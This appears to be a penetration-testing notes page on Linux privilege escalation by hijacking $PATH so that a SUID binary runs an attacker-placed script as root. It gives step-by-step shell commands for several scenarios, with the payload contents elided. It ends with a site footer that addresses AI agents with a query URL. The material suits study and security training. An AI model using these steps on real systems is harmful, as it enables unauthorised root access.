# $PATH ### $PATH environment variable ```bash $ echo $ PATH ... ``` ### Possible exploitable scenarios 1. A script with ***SUID*** bit (`/usr/bin/bin-with-suid`) is found to execute a particular named script that is not defined Assume the named script that is executed is `test-bin` ```bash $ find / -perm -u=s -type f 2>/dev/null /usr/bin/bin-with-suid $ /usr/bin/bin-with-suid # error message indicating that test-bin is executed, but not found sh: 1: test-bin: not found ``` a)`$PATH` environment variable can be edited ***ONLY*** b) Write permissions for a default value found in the `$PATH`environment variable ***ONLY*** ***Scenario a)*** ```bash $ echo $PATH /usr/local/sbin:/usr/local/bin ... $ export PATH=/tmp:$PATH $ echo $PATH /tmp:/usr/local/sbin:/usr/local/bin ... $ cd /tmp $ nano test-bin #!/... ... $ /usr/bin/bin-with-suid ... executes /tmp/test-bin with ROOT privileges ``` **Scenario b)** ```bash $ echo $PATH /usr/local/sbin:/usr/local/bin ... $ find / -writable 2>/dev/null ... /usr/local/bin ... $ cd /usr/local/bin $ nano test-bin #!/... ... $ /usr/bin/bin-with-suid ... executes /usr/local/bin/test-bin with ROOT privileges ``` 2. A script with ***SUID*** bit (`/usr/bin/bin-with-suid`) is found to execute a named script that is defined Assume the named script that is executed is `test-bin` (present in `/usr/local/bin/`) a)`$PATH` environment variable can be edited ***ONLY*** b) Write permissions for a path value in the`$PATH`environment variable ***ONLY*** **Scenario a)** Prepend a writable directory such as `/tmp` to the `$PATH` environment variable, and create a script with the name of that executed from the original script, in the same directory. This allows the created script to be executed with `root` privileges. ```bash $ export PATH=/tmp:$PATH $ cd /tmp $ nano test-bin #!/... ... $ /usr/bin/bin-with-suid ... executes /tmp/test-bin with ROOT privileges ``` **Scenario b)** ***There are 2 further possible scenarios*** 1. The path value we have write permissions for appears before the path where the named script is found. This allows us to trick the `SUID` bit script to execute the script defined by us instead. This is because the system searches for script using the path variable listed from **left to right** in the `$PATH`environment variable Assume that we have write permissions for the folder`/usr/local/sbin`, and this path appears to the left of the value `/usr/local/bin`(path for the original script) in`$PATH` ```bash $ echo $PATH /usr/local/sbin:/usr/local/bin ... $ cd /usr/local/sbin $ find / -name test-bin 2>/dev/null /usr/local/bin/test-bin $ nano test-bin #!... ... $ /usr/bin/bin-with-suid # notice that the path is /usr/local/sbin, and NOT /usr/local/bin ... executes /usr/local/sbin/test-bin with ROOT privileges ``` 2. We have write permissions for the actual path of the named script ```bash $ ls -l /usr/local | grep bin drwxrwxrwx 2 root root xxxx xxx x ... bin ... $ cd /usr/local/bin $ rm test-bin $ nano test-bin #!... ... $ /usr/bin/bin-with-suid ... executes /usr/local/bin/test-bin defined by yourself - with ROOT privileges ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jarrettgxz-sec.gitbook.io/penetration-testing-ethical-hacking-concepts/privilege-escalation/linux/vulnerabilities-exploit/usdpath.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.